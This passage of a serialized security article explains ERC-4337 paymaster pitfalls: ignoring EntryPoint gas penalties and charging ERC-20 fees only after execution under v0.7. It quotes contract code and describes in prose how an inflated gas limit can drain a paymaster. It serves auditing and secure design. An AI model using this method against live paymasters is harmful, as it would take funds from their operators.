UserOperationSponsored",{"type":26,"tag":137,"props":106955,"children":106956},{"style":5601},[106957],{"type":32,"value":106958},"(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n",{"type":26,"tag":137,"props":106960,"children":106961},{"class":5559,"line":104182},[106962,106967],{"type":26,"tag":137,"props":106963,"children":106964},{"style":5682},[106965],{"type":32,"value":106966},"            refillEntryPointDeposit",{"type":26,"tag":137,"props":106968,"children":106969},{"style":5601},[106970],{"type":32,"value":106971},"(_cachedPrice);\n",{"type":26,"tag":137,"props":106973,"children":106974},{"class":5559,"line":104210},[106975],{"type":26,"tag":137,"props":106976,"children":106977},{"style":5601},[106978],{"type":32,"value":5936},{"type":26,"tag":137,"props":106980,"children":106982},{"class":5559,"line":106981},67,[106983],{"type":26,"tag":137,"props":106984,"children":106985},{"style":5601},[106986],{"type":32,"value":5945},{"type":26,"tag":137,"props":106988,"children":106990},{"class":5559,"line":106989},68,[106991],{"type":26,"tag":137,"props":106992,"children":106993},{"style":5601},[106994],{"type":32,"value":6507},{"type":26,"tag":35,"props":106996,"children":106997},{},[106998,107000,107006,107008,107013,107015,107021],{"type":32,"value":106999},"Looking at the code above, during ",{"type":26,"tag":130,"props":107001,"children":107003},{"className":107002},[],[107004],{"type":32,"value":107005},"validatePaymasterUserOp",{"type":32,"value":107007},", the paymaster attempts to charge a maximum prefund amount first. This prefund is calculated by taking the gas limit specified in the ",{"type":26,"tag":130,"props":107009,"children":107011},{"className":107010},[],[107012],{"type":32,"value":105064},{"type":32,"value":107014}," and applying a markup price to convert the native ETH cost into the equivalent ERC20-token value. Later in ",{"type":26,"tag":130,"props":107016,"children":107018},{"className":107017},[],[107019],{"type":32,"value":107020},"postOp",{"type":32,"value":107022},", the paymaster calculates the actual charge and refunds any excess from the prefund.",{"type":26,"tag":35,"props":107024,"children":107025},{},[107026,107028,107033,107035,107042],{"type":32,"value":107027},"However, there is a critical oversight: ",{"type":26,"tag":84,"props":107029,"children":107030},{},[107031],{"type":32,"value":107032},"the code does not account for gas penalties",{"type":32,"value":107034},". The actual gas charged to the paymaster includes not just the gas used, but also any ",{"type":26,"tag":41,"props":107036,"children":107039},{"href":107037,"rel":107038},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L726-L730",[45],[107040],{"type":32,"value":107041},"penalties incurred",{"type":32,"value":107043}," from differences between the execution gas limit and actual execution gas.",{"type":26,"tag":35,"props":107045,"children":107046},{},[107047],{"type":32,"value":107048},"This vulnerability can be exploited by malicious users who set an artificially high gas limit to trigger the penalty. When penalties are applied, the paymaster will be charged significantly more than expected, potentially draining its funds since these additional costs were not factored into the calculation.",{"type":26,"tag":35,"props":107050,"children":107051},{},[107052,107054,107059],{"type":32,"value":107053},"In fact, the bundler will be the one who receives the penalty paid by the paymaster. This means a bundler could submit their own ",{"type":26,"tag":130,"props":107055,"children":107057},{"className":107056},[],[107058],{"type":32,"value":104763},{"type":32,"value":107060}," to be executed by themselves and profit if the penalty they can extract from the paymaster exceeds their own gas costs paid to the paymaster. In SEND's case, fortunately, because they operate their own bundler, any penalties incurred flow back to their controlled bundler, creating a closed economic loop that mitigates this particular attack vector.",{"type":26,"tag":92,"props":107062,"children":107064},{"id":107063},"incorrect-erc-20-handling",[107065],{"type":26,"tag":84,"props":107066,"children":107067},{},[107068],{"type":32,"value":107069},"Incorrect ERC-20 Handling",{"type":26,"tag":35,"props":107071,"children":107072},{},[107073],{"type":32,"value":107074},"To improve user experience, some protocols introduced ERC-20 paymasters that allow users to pay transaction gas fees using ERC-20 tokens instead of native ETH (Just like what SEND did in the above code). The core concept is quite straightforward, the paymaster fronts the ETH gas costs to bundlers, then charges users an equivalent amount in ERC-20 tokens based on current market rates. However, implementing this token-to-ETH conversion and payment flow securely requires careful consideration.",{"type":26,"tag":35,"props":107076,"children":107077},{},[107078,107079,107084,107086,107091],{"type":32,"value":47898},{"type":26,"tag":130,"props":107080,"children":107082},{"className":107081},[],[107083],{"type":32,"value":104844},{"type":32,"value":107085}," flow above, we can see that paymasters have two key interaction points during a ",{"type":26,"tag":130,"props":107087,"children":107089},{"className":107088},[],[107090],{"type":32,"value":104763},{"type":32,"value":107092},"'s lifecycle:",{"type":26,"tag":4820,"props":107094,"children":107095},{},[107096,107106],{"type":26,"tag":3430,"props":107097,"children":107098},{},[107099,107101],{"type":32,"value":107100},"During validation via ",{"type":26,"tag":130,"props":107102,"children":107104},{"className":107103},[],[107105],{"type":32,"value":104951},{"type":26,"tag":3430,"props":107107,"children":107108},{},[107109,107111],{"type":32,"value":107110},"After execution via ",{"type":26,"tag":130,"props":107112,"children":107114},{"className":107113},[],[107115],{"type":32,"value":104962},{"type":26,"tag":35,"props":107117,"children":107118},{},[107119],{"type":32,"value":107120},"This dual-interaction model has led to two predominant patterns for handling ERC-20 payments in paymaster implementations:",{"type":26,"tag":118,"props":107122,"children":107124},{"id":107123},"_1-pre-payment-with-refund-pattern",[107125],{"type":32,"value":107126},"1. Pre-Payment with Refund Pattern",{"type":26,"tag":35,"props":107128,"children":107129},{},[107130,107132,107137,107139,107144,107146,107152,107153,107159,107161,107166,107168,107172,107174,107179],{"type":32,"value":107131},"In this model, the paymaster requires users to pre-pay the maximum possible gas cost in ERC-20 tokens during ",{"type":26,"tag":130,"props":107133,"children":107135},{"className":107134},[],[107136],{"type":32,"value":104951},{"type":32,"value":107138},". After execution completes, ",{"type":26,"tag":130,"props":107140,"children":107142},{"className":107141},[],[107143],{"type":32,"value":104962},{"type":32,"value":107145}," refunds any excess tokens based on actual gas consumed. This is analogous to how regular ETH gas payments work. Several protocols like ",{"type":26,"tag":130,"props":107147,"children":107149},{"className":107148},[],[107150],{"type":32,"value":107151},"SEND",{"type":32,"value":3339},{"type":26,"tag":130,"props":107154,"children":107156},{"className":107155},[],[107157],{"type":32,"value":107158},"Circle",{"type":32,"value":107160}," have implemented this approach. However, this pattern has one key disadvantage: users must first approve the paymaster to spend their ERC20 tokens before submitting any ",{"type":26,"tag":130,"props":107162,"children":107164},{"className":107163},[],[107165],{"type":32,"value":104792},{"type":32,"value":107167},". This additional setup step is required to ensure the paymaster can successfully deduct tokens ",{"type":26,"tag":84,"props":107169,"children":107170},{},[107171],{"type":32,"value":2526},{"type":32,"value":107173}," execution (specifically during ",{"type":26,"tag":130,"props":107175,"children":107177},{"className":107176},[],[107178],{"type":32,"value":107005},{"type":32,"value":4437},{"type":26,"tag":118,"props":107181,"children":107183},{"id":107182},"_2-post-execution-charging-pattern",[107184],{"type":32,"value":107185},"2. Post-Execution Charging Pattern",{"type":26,"tag":35,"props":107187,"children":107188},{},[107189,107191,107196,107198,107203,107205,107210,107212,107217],{"type":32,"value":107190},"This alternative approach defers token collection until after execution. Instead of charging a prefund during ",{"type":26,"tag":130,"props":107192,"children":107194},{"className":107193},[],[107195],{"type":32,"value":104951},{"type":32,"value":107197},", the actual token payment is calculated and collected in ",{"type":26,"tag":130,"props":107199,"children":107201},{"className":107200},[],[107202],{"type":32,"value":104962},{"type":32,"value":107204}," based on the exact gas consumed. At first glance, this appears to be the most user-friendly pattern since users can bundle their token approval transaction within the same ",{"type":26,"tag":130,"props":107206,"children":107208},{"className":107207},[],[107209],{"type":32,"value":104763},{"type":32,"value":107211},", eliminating the need for a separate pre-approval transaction before submitting the ",{"type":26,"tag":130,"props":107213,"children":107215},{"className":107214},[],[107216],{"type":32,"value":105064},{"type":32,"value":107218},". This means users could interact with the paymaster without any prior setup.",{"type":26,"tag":35,"props":107220,"children":107221},{},[107222,107224,107229,107231,107237,107239,107245,107247,107252],{"type":32,"value":107223},"This approach used to work in ",{"type":26,"tag":130,"props":107225,"children":107227},{"className":107226},[],[107228],{"type":32,"value":104844},{"type":32,"value":107230}," version ",{"type":26,"tag":130,"props":107232,"children":107234},{"className":107233},[],[107235],{"type":32,"value":107236},"v0.6",{"type":32,"value":107238},", but the pattern no longer works in ",{"type":26,"tag":130,"props":107240,"children":107242},{"className":107241},[],[107243],{"type":32,"value":107244},"v0.7",{"type":32,"value":107246},". In fact, using this pattern can lead to loss of funds for the paymaster. Let's take a closer look at how ",{"type":26,"tag":130,"props":107248,"children":107250},{"className":107249},[],[107251],{"type":32,"value":107244},{"type":32,"value":107253}," handles the execution phase:",{"type":26,"tag":5512,"props":107255,"children":107257},{"className":7055,"code":107256,"language":7054,"meta":7,"style":7},"    function _executeUserOp(\n        uint256 opIndex,\n        PackedUserOperation calldata userOp,\n        UserOpInfo memory opInfo\n    )\n    internal virtual\n    returns (uint256 collected) {\n    [...]\n        bool success;\n        {\n    [...]\n            if (methodSig == IAccountExecute.executeUserOp.selector) {\n                bytes memory executeUserOp = abi.encodeCall(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n                innerCall = abi.encodeCall(this.innerHandleOp, (executeUserOp, opInfo, context));\n            } else\n            {\n                innerCall = abi.encodeCall(this.innerHandleOp, (callData, opInfo, context));\n            }\n            assembly (\"memory-safe\") {\n                success := call(gas(), address(), 0, add(innerCall, 0x20), mload(innerCall), 0, 32)\n                collected := mload(0)\n            }\n            _restoreFreePtr(saveFreePtr);\n        }\n        if (!success) {\n    [...]\n            if (innerRevertCode == INNER_OUT_OF_GAS) {\n                // handleOps was called with gas limit too low. abort entire bundle.\n                // can only be caused by bundler (leaving not enough gas for inner call)\n                revert FailedOp(opIndex, \"AA95 out of gas\");\n            } else if (innerRevertCode == INNER_REVERT_LOW_PREFUND) {\n                // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n                uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n                uint256 actualGasCost = opInfo.prefund;\n                _emitPrefundTooLow(opInfo);\n                _emitUserOperationEvent(opInfo, false, actualGasCost, actualGas);\n                collected = actualGasCost;\n            } else {\n    [...]\n                collected = _postExecution(\n                    IPaymaster.PostOpMode.postOpReverted,\n                    opInfo,\n                    context,\n                    actualGas\n                );\n            }\n        }\n    }\n",[107258],{"type":26,"tag":130,"props":107259,"children":107260},{"__ignoreMap":7},[107261,107277,107293,107313,107330,107337,107350,107374,107382,107395,107402,107409,107430,107469,107506,107518,107525,107561,107568,107589,107678,107707,107714,107727,107734,107754,107761,107782,107790,107798,107825,107853,107861,107904,107924,107937,107959,107975,107990,107997,108017,108025,108033,108041,108049,108057,108064,108071],{"type":26,"tag":137,"props":107262,"children":107263},{"class":5559,"line":5560},[107264,107268,107273],{"type":26,"tag":137,"props":107265,"children":107266},{"style":5573},[107267],{"type":32,"value":92433},{"type":26,"tag":137,"props":107269,"children":107270},{"style":5682},[107271],{"type":32,"value":107272}," _executeUserOp",{"type":26,"tag":137,"props":107274,"children":107275},{"style":5601},[107276],{"type":32,"value":6054},{"type":26,"tag":137,"props":107278,"children":107279},{"class":5559,"line":5412},[107280,107284,107289],{"type":26,"tag":137,"props":107281,"children":107282},{"style":6009},[107283],{"type":32,"value":92611},{"type":26,"tag":137,"props":107285,"children":107286},{"style":5584},[107287],{"type":32,"value":107288}," opIndex",{"type":26,"tag":137,"props":107290,"children":107291},{"style":5601},[107292],{"type":32,"value":6099},{"type":26,"tag":137,"props":107294,"children":107295},{"class":5559,"line":5417},[107296,107301,107305,107309],{"type":26,"tag":137,"props":107297,"children":107298},{"style":5573},[107299],{"type":32,"value":107300},"        PackedUserOperation",{"type":26,"tag":137,"props":107302,"children":107303},{"style":5573},[107304],{"type":32,"value":105593},{"type":26,"tag":137,"props":107306,"children":107307},{"style":5584},[107308],{"type":32,"value":105598},{"type":26,"tag":137,"props":107310,"children":107311},{"style":5601},[107312],{"type":32,"value":6099},{"type":26,"tag":137,"props":107314,"children":107315},{"class":5559,"line":5642},[107316,107321,107325],{"type":26,"tag":137,"props":107317,"children":107318},{"style":5573},[107319],{"type":32,"value":107320},"        UserOpInfo",{"type":26,"tag":137,"props":107322,"children":107323},{"style":5573},[107324],{"type":32,"value":105661},{"type":26,"tag":137,"props":107326,"children":107327},{"style":5584},[107328],{"type":32,"value":107329}," opInfo\n",{"type":26,"tag":137,"props":107331,"children":107332},{"class":5559,"line":5745},[107333],{"type":26,"tag":137,"props":107334,"children":107335},{"style":5601},[107336],{"type":32,"value":26510},{"type":26,"tag":137,"props":107338,"children":107339},{"class":5559,"line":5850},[107340,107345],{"type":26,"tag":137,"props":107341,"children":107342},{"style":5573},[107343],{"type":32,"value":107344},"    internal",{"type":26,"tag":137,"props":107346,"children":107347},{"style":5573},[107348],{"type":32,"value":107349}," virtual\n",{"type":26,"tag":137,"props":107351,"children":107352},{"class":5559,"line":5878},[107353,107357,107361,107365,107370],{"type":26,"tag":137,"props":107354,"children":107355},{"style":5610},[107356],{"type":32,"value":49111},{"type":26,"tag":137,"props":107358,"children":107359},{"style":5601},[107360],{"type":32,"value":4625},{"type":26,"tag":137,"props":107362,"children":107363},{"style":6009},[107364],{"type":32,"value":48770},{"type":26,"tag":137,"props":107366,"children":107367},{"style":5584},[107368],{"type":32,"value":107369}," collected",{"type":26,"tag":137,"props":107371,"children":107372},{"style":5601},[107373],{"type":32,"value":17395},{"type":26,"tag":137,"props":107375,"children":107376},{"class":5559,"line":5891},[107377],{"type":26,"tag":137,"props":107378,"children":107379},{"style":5601},[107380],{"type":32,"value":107381},"    [...]\n",{"type":26,"tag":137,"props":107383,"children":107384},{"class":5559,"line":5909},[107385,107390],{"type":26,"tag":137,"props":107386,"children":107387},{"style":6009},[107388],{"type":32,"value":107389},"        bool",{"type":26,"tag":137,"props":107391,"children":107392},{"style":5601},[107393],{"type":32,"value":107394}," success;\n",{"type":26,"tag":137,"props":107396,"children":107397},{"class":5559,"line":5930},[107398],{"type":26,"tag":137,"props":107399,"children":107400},{"style":5601},[107401],{"type":32,"value":34254},{"type":26,"tag":137,"props":107403,"children":107404},{"class":5559,"line":5939},[107405],{"type":26,"tag":137,"props":107406,"children":107407},{"style":5601},[107408],{"type":32,"value":107381},{"type":26,"tag":137,"props":107410,"children":107411},{"class":5559,"line":6191},[107412,107416,107421,107425],{"type":26,"tag":137,"props":107413,"children":107414},{"style":5610},[107415],{"type":32,"value":61402},{"type":26,"tag":137,"props":107417,"children":107418},{"style":5601},[107419],{"type":32,"value":107420}," (methodSig ",{"type":26,"tag":137,"props":107422,"children":107423},{"style":5590},[107424],{"type":32,"value":11161},{"type":26,"tag":137,"props":107426,"children":107427},{"style":5601},[107428],{"type":32,"value":107429}," IAccountExecute.executeUserOp.selector) {\n",{"type":26,"tag":137,"props":107431,"children":107432},{"class":5559,"line":6208},[107433,107438,107442,107447,107451,107455,107459,107464],{"type":26,"tag":137,"props":107434,"children":107435},{"style":6009},[107436],{"type":32,"value":107437},"                bytes",{"type":26,"tag":137,"props":107439,"children":107440},{"style":5573},[107441],{"type":32,"value":105661},{"type":26,"tag":137,"props":107443,"children":107444},{"style":5601},[107445],{"type":32,"value":107446}," executeUserOp ",{"type":26,"tag":137,"props":107448,"children":107449},{"style":5590},[107450],{"type":32,"value":289},{"type":26,"tag":137,"props":107452,"children":107453},{"style":5573},[107454],{"type":32,"value":106258},{"type":26,"tag":137,"props":107456,"children":107457},{"style":5601},[107458],{"type":32,"value":470},{"type":26,"tag":137,"props":107460,"children":107461},{"style":5682},[107462],{"type":32,"value":107463},"encodeCall",{"type":26,"tag":137,"props":107465,"children":107466},{"style":5601},[107467],{"type":32,"value":107468},"(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n",{"type":26,"tag":137,"props":107470,"children":107471},{"class":5559,"line":6225},[107472,107477,107481,107485,107489,107493,107497,107501],{"type":26,"tag":137,"props":107473,"children":107474},{"style":5601},[107475],{"type":32,"value":107476},"                innerCall ",{"type":26,"tag":137,"props":107478,"children":107479},{"style":5590},[107480],{"type":32,"value":289},{"type":26,"tag":137,"props":107482,"children":107483},{"style":5573},[107484],{"type":32,"value":106258},{"type":26,"tag":137,"props":107486,"children":107487},{"style":5601},[107488],{"type":32,"value":470},{"type":26,"tag":137,"props":107490,"children":107491},{"style":5682},[107492],{"type":32,"value":107463},{"type":26,"tag":137,"props":107494,"children":107495},{"style":5601},[107496],{"type":32,"value":165},{"type":26,"tag":137,"props":107498,"children":107499},{"style":5573},[107500],{"type":32,"value":20285},{"type":26,"tag":137,"props":107502,"children":107503},{"style":5601},[107504],{"type":32,"value":107505},".innerHandleOp, (executeUserOp, opInfo, context));\n",{"type":26,"tag":137,"props":107507,"children":107508},{"class":5559,"line":6238},[107509,107513],{"type":26,"tag":137,"props":107510,"children":107511},{"style":5601},[107512],{"type":32,"value":73195},{"type":26,"tag":137,"props":107514,"children":107515},{"style":5610},[107516],{"type":32,"value":107517},"else\n",{"type":26,"tag":137,"props":107519,"children":107520},{"class":5559,"line":6247},[107521],{"type":26,"tag":137,"props":107522,"children":107523},{"style":5601},[107524],{"type":32,"value":34290},{"type":26,"tag":137,"props":107526,"children":107527},{"class":5559,"line":6270},[107528,107532,107536,107540,107544,107548,107552,107556],{"type":26,"tag":137,"props":107529,"children":107530},{"style":5601},[107531],{"type":32,"value":107476},{"type":26,"tag":137,"props":107533,"children":107534},{"style":5590},[107535],{"type":32,"value":289},{"type":26,"tag":137,"props":107537,"children":107538},{"style":5573},[107539],{"type":32,"value":106258},{"type":26,"tag":137,"props":107541,"children":107542},{"style":5601},[107543],{"type":32,"value":470},{"type":26,"tag":137,"props":107545,"children":107546},{"style":5682},[107547],{"type":32,"value":107463},{"type":26,"tag":137,"props":107549,"children":107550},{"style":5601},[107551],{"type":32,"value":165},{"type":26,"tag":137,"props":107553,"children":107554},{"style":5573},[107555],{"type":32,"value":20285},{"type":26,"tag":137,"props":107557,"children":107558},{"style":5601},[107559],{"type":32,"value":107560},".innerHandleOp, (callData, opInfo, context));\n",{"type":26,"tag":137,"props":107562,"children":107563},{"class":5559,"line":6279},[107564],{"type":26,"tag":137,"props":107565,"children":107566},{"style":5601},[107567],{"type":32,"value":61486},{"type":26,"tag":137,"props":107569,"children":107570},{"class":5559,"line":6288},[107571,107576,107580,107585],{"type":26,"tag":137,"props":107572,"children":107573},{"style":5682},[107574],{"type":32,"value":107575},"            assembly",{"type":26,"tag":137,"props":107577,"children":107578},{"style":5601},[107579],{"type":32,"value":4625},{"type":26,"tag":137,"props":107581,"children":107582},{"style":6837},[107583],{"type":32,"value":107584},"\"memory-safe\"",{"type":26,"tag":137,"props":107586,"children":107587},{"style":5601},[107588],{"type":32,"value":17395},{"type":26,"tag":137,"props":107590,"children":107591},{"class":5559,"line":6355},[107592,107597,107601,107605,107609,107614,107618,107622,107626,107630,107634,107638,107643,107648,107652,107657,107662,107666,107670,107674],{"type":26,"tag":137,"props":107593,"children":107594},{"style":5601},[107595],{"type":32,"value":107596},"                success ",{"type":26,"tag":137,"props":107598,"children":107599},{"style":5590},[107600],{"type":32,"value":24196},{"type":26,"tag":137,"props":107602,"children":107603},{"style":5682},[107604],{"type":32,"value":43560},{"type":26,"tag":137,"props":107606,"children":107607},{"style":5601},[107608],{"type":32,"value":165},{"type":26,"tag":137,"props":107610,"children":107611},{"style":5682},[107612],{"type":32,"value":107613},"gas",{"type":26,"tag":137,"props":107615,"children":107616},{"style":5601},[107617],{"type":32,"value":20968},{"type":26,"tag":137,"props":107619,"children":107620},{"style":6009},[107621],{"type":32,"value":35236},{"type":26,"tag":137,"props":107623,"children":107624},{"style":5601},[107625],{"type":32,"value":20968},{"type":26,"tag":137,"props":107627,"children":107628},{"style":5626},[107629],{"type":32,"value":1817},{"type":26,"tag":137,"props":107631,"children":107632},{"style":5601},[107633],{"type":32,"value":1108},{"type":26,"tag":137,"props":107635,"children":107636},{"style":5682},[107637],{"type":32,"value":12227},{"type":26,"tag":137,"props":107639,"children":107640},{"style":5601},[107641],{"type":32,"value":107642},"(innerCall, ",{"type":26,"tag":137,"props":107644,"children":107645},{"style":5626},[107646],{"type":32,"value":107647},"0x20",{"type":26,"tag":137,"props":107649,"children":107650},{"style":5601},[107651],{"type":32,"value":17769},{"type":26,"tag":137,"props":107653,"children":107654},{"style":5682},[107655],{"type":32,"value":107656},"mload",{"type":26,"tag":137,"props":107658,"children":107659},{"style":5601},[107660],{"type":32,"value":107661},"(innerCall), ",{"type":26,"tag":137,"props":107663,"children":107664},{"style":5626},[107665],{"type":32,"value":1817},{"type":26,"tag":137,"props":107667,"children":107668},{"style":5601},[107669],{"type":32,"value":1108},{"type":26,"tag":137,"props":107671,"children":107672},{"style":5626},[107673],{"type":32,"value":62948},{"type":26,"tag":137,"props":107675,"children":107676},{"style":5601},[107677],{"type":32,"value":5742},{"type":26,"tag":137,"props":107679,"children":107680},{"class":5559,"line":6363},[107681,107686,107690,107695,107699,107703],{"type":26,"tag":137,"props":107682,"children":107683},{"style":5601},[107684],{"type":32,"value":107685},"                collected ",{"type":26,"tag":137,"props":107687,"children":107688},{"style":5590},[107689],{"type":32,"value":24196},{"type":26,"tag":137,"props":107691,"children":107692},{"style":5682},[107693],{"type":32,"value":107694}," mload",{"type":26,"tag":137,"props":107696,"children":107697},{"style":5601},[107698],{"type":32,"value":165},{"type":26,"tag":137,"props":107700,"children":107701},{"style":5626},[107702],{"type":32,"value":1817},{"type":26,"tag":137,"props":107704,"children":107705},{"style":5601},[107706],{"type":32,"value":5742},{"type":26,"tag":137,"props":107708,"children":107709},{"class":5559,"line":6393},[107710],{"type":26,"tag":137,"props":107711,"children":107712},{"style":5601},[107713],{"type":32,"value":61486},{"type":26,"tag":137,"props":107715,"children":107716},{"class":5559,"line":6401},[107717,107722],{"type":26,"tag":137,"props":107718,"children":107719},{"style":5682},[107720],{"type":32,"value":107721},"            _restoreFreePtr",{"type":26,"tag":137,"props":107723,"children":107724},{"style":5601},[107725],{"type":32,"value":107726},"(saveFreePtr);\n",{"type":26,"tag":137,"props":107728,"children":107729},{"class":5559,"line":6433},[107730],{"type":26,"tag":137,"props":107731,"children":107732},{"style":5601},[107733],{"type":32,"value":5936},{"type":26,"tag":137,"props":107735,"children":107736},{"class":5559,"line":6441},[107737,107741,107745,107749],{"type":26,"tag":137,"props":107738,"children":107739},{"style":5610},[107740],{"type":32,"value":5856},{"type":26,"tag":137,"props":107742,"children":107743},{"style":5601},[107744],{"type":32,"value":4625},{"type":26,"tag":137,"props":107746,"children":107747},{"style":5590},[107748],{"type":32,"value":23215},{"type":26,"tag":137,"props":107750,"children":107751},{"style":5601},[107752],{"type":32,"value":107753},"success) {\n",{"type":26,"tag":137,"props":107755,"children":107756},{"class":5559,"line":6501},[107757],{"type":26,"tag":137,"props":107758,"children":107759},{"style":5601},[107760],{"type":32,"value":107381},{"type":26,"tag":137,"props":107762,"children":107763},{"class":5559,"line":11634},[107764,107768,107773,107777],{"type":26,"tag":137,"props":107765,"children":107766},{"style":5610},[107767],{"type":32,"value":61402},{"type":26,"tag":137,"props":107769,"children":107770},{"style":5601},[107771],{"type":32,"value":107772}," (innerRevertCode ",{"type":26,"tag":137,"props":107774,"children":107775},{"style":5590},[107776],{"type":32,"value":11161},{"type":26,"tag":137,"props":107778,"children":107779},{"style":5601},[107780],{"type":32,"value":107781}," INNER_OUT_OF_GAS) {\n",{"type":26,"tag":137,"props":107783,"children":107784},{"class":5559,"line":11652},[107785],{"type":26,"tag":137,"props":107786,"children":107787},{"style":5564},[107788],{"type":32,"value":107789},"                // handleOps was called with gas limit too low. abort entire bundle.\n",{"type":26,"tag":137,"props":107791,"children":107792},{"class":5559,"line":11697},[107793],{"type":26,"tag":137,"props":107794,"children":107795},{"style":5564},[107796],{"type":32,"value":107797},"                // can only be caused by bundler (leaving not enough gas for inner call)\n",{"type":26,"tag":137,"props":107799,"children":107800},{"class":5559,"line":11803},[107801,107806,107811,107816,107821],{"type":26,"tag":137,"props":107802,"children":107803},{"style":5610},[107804],{"type":32,"value":107805},"                revert",{"type":26,"tag":137,"props":107807,"children":107808},{"style":5682},[107809],{"type":32,"value":107810}," FailedOp",{"type":26,"tag":137,"props":107812,"children":107813},{"style":5601},[107814],{"type":32,"value":107815},"(opIndex, ",{"type":26,"tag":137,"props":107817,"children":107818},{"style":6837},[107819],{"type":32,"value":107820},"\"AA95 out of gas\"",{"type":26,"tag":137,"props":107822,"children":107823},{"style":5601},[107824],{"type":32,"value":6430},{"type":26,"tag":137,"props":107826,"children":107827},{"class":5559,"line":26089},[107828,107832,107836,107840,107844,107848],{"type":26,"tag":137,"props":107829,"children":107830},{"style":5601},[107831],{"type":32,"value":73195},{"type":26,"tag":137,"props":107833,"children":107834},{"style":5610},[107835],{"type":32,"value":5902},{"type":26,"tag":137,"props":107837,"children":107838},{"style":5610},[107839],{"type":32,"value":18380},{"type":26,"tag":137,"props":107841,"children":107842},{"style":5601},[107843],{"type":32,"value":107772},{"type":26,"tag":137,"props":107845,"children":107846},{"style":5590},[107847],{"type":32,"value":11161},{"type":26,"tag":137,"props":107849,"children":107850},{"style":5601},[107851],{"type":32,"value":107852}," INNER_REVERT_LOW_PREFUND) {\n",{"type":26,"tag":137,"props":107854,"children":107855},{"class":5559,"line":26124},[107856],{"type":26,"tag":137,"props":107857,"children":107858},{"style":5564},[107859],{"type":32,"value":107860},"                // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n",{"type":26,"tag":137,"props":107862,"children":107863},{"class":5559,"line":26132},[107864,107868,107873,107877,107882,107886,107891,107895,107899],{"type":26,"tag":137,"props":107865,"children":107866},{"style":6009},[107867],{"type":32,"value":106041},{"type":26,"tag":137,"props":107869,"children":107870},{"style":5601},[107871],{"type":32,"value":107872}," actualGas ",{"type":26,"tag":137,"props":107874,"children":107875},{"style":5590},[107876],{"type":32,"value":289},{"type":26,"tag":137,"props":107878,"children":107879},{"style":5601},[107880],{"type":32,"value":107881}," preGas ",{"type":26,"tag":137,"props":107883,"children":107884},{"style":5590},[107885],{"type":32,"value":6908},{"type":26,"tag":137,"props":107887,"children":107888},{"style":5573},[107889],{"type":32,"value":107890}," gasleft",{"type":26,"tag":137,"props":107892,"children":107893},{"style":5601},[107894],{"type":32,"value":16634},{"type":26,"tag":137,"props":107896,"children":107897},{"style":5590},[107898],{"type":32,"value":356},{"type":26,"tag":137,"props":107900,"children":107901},{"style":5601},[107902],{"type":32,"value":107903}," opInfo.preOpGas;\n",{"type":26,"tag":137,"props":107905,"children":107906},{"class":5559,"line":26140},[107907,107911,107915,107919],{"type":26,"tag":137,"props":107908,"children":107909},{"style":6009},[107910],{"type":32,"value":106041},{"type":26,"tag":137,"props":107912,"children":107913},{"style":5601},[107914],{"type":32,"value":106688},{"type":26,"tag":137,"props":107916,"children":107917},{"style":5590},[107918],{"type":32,"value":289},{"type":26,"tag":137,"props":107920,"children":107921},{"style":5601},[107922],{"type":32,"value":107923}," opInfo.prefund;\n",{"type":26,"tag":137,"props":107925,"children":107926},{"class":5559,"line":26149},[107927,107932],{"type":26,"tag":137,"props":107928,"children":107929},{"style":5682},[107930],{"type":32,"value":107931},"                _emitPrefundTooLow",{"type":26,"tag":137,"props":107933,"children":107934},{"style":5601},[107935],{"type":32,"value":107936},"(opInfo);\n",{"type":26,"tag":137,"props":107938,"children":107939},{"class":5559,"line":26191},[107940,107945,107950,107954],{"type":26,"tag":137,"props":107941,"children":107942},{"style":5682},[107943],{"type":32,"value":107944},"                _emitUserOperationEvent",{"type":26,"tag":137,"props":107946,"children":107947},{"style":5601},[107948],{"type":32,"value":107949},"(opInfo, ",{"type":26,"tag":137,"props":107951,"children":107952},{"style":5573},[107953],{"type":32,"value":10760},{"type":26,"tag":137,"props":107955,"children":107956},{"style":5601},[107957],{"type":32,"value":107958},", actualGasCost, actualGas);\n",{"type":26,"tag":137,"props":107960,"children":107961},{"class":5559,"line":26224},[107962,107966,107970],{"type":26,"tag":137,"props":107963,"children":107964},{"style":5601},[107965],{"type":32,"value":107685},{"type":26,"tag":137,"props":107967,"children":107968},{"style":5590},[107969],{"type":32,"value":289},{"type":26,"tag":137,"props":107971,"children":107972},{"style":5601},[107973],{"type":32,"value":107974}," actualGasCost;\n",{"type":26,"tag":137,"props":107976,"children":107977},{"class":5559,"line":26232},[107978,107982,107986],{"type":26,"tag":137,"props":107979,"children":107980},{"style":5601},[107981],{"type":32,"value":73195},{"type":26,"tag":137,"props":107983,"children":107984},{"style":5610},[107985],{"type":32,"value":5902},{"type":26,"tag":137,"props":107987,"children":107988},{"style":5601},[107989],{"type":32,"value":5875},{"type":26,"tag":137,"props":107991,"children":107992},{"class":5559,"line":26240},[107993],{"type":26,"tag":137,"props":107994,"children":107995},{"style":5601},[107996],{"type":32,"value":107381},{"type":26,"tag":137,"props":107998,"children":107999},{"class":5559,"line":26249},[108000,108004,108008,108013],{"type":26,"tag":137,"props":108001,"children":108002},{"style":5601},[108003],{"type":32,"value":107685},{"type":26,"tag":137,"props":108005,"children":108006},{"style":5590},[108007],{"type":32,"value":289},{"type":26,"tag":137,"props":108009,"children":108010},{"style":5682},[108011],{"type":32,"value":108012}," _postExecution",{"type":26,"tag":137,"props":108014,"children":108015},{"style":5601},[108016],{"type":32,"value":6054},{"type":26,"tag":137,"props":108018,"children":108019},{"class":5559,"line":26325},[108020],{"type":26,"tag":137,"props":108021,"children":108022},{"style":5601},[108023],{"type":32,"value":108024},"                    IPaymaster.PostOpMode.postOpReverted,\n",{"type":26,"tag":137,"props":108026,"children":108027},{"class":5559,"line":26358},[108028],{"type":26,"tag":137,"props":108029,"children":108030},{"style":5601},[108031],{"type":32,"value":108032},"                    opInfo,\n",{"type":26,"tag":137,"props":108034,"children":108035},{"class":5559,"line":26366},[108036],{"type":26,"tag":137,"props":108037,"children":108038},{"style":5601},[108039],{"type":32,"value":108040},"                    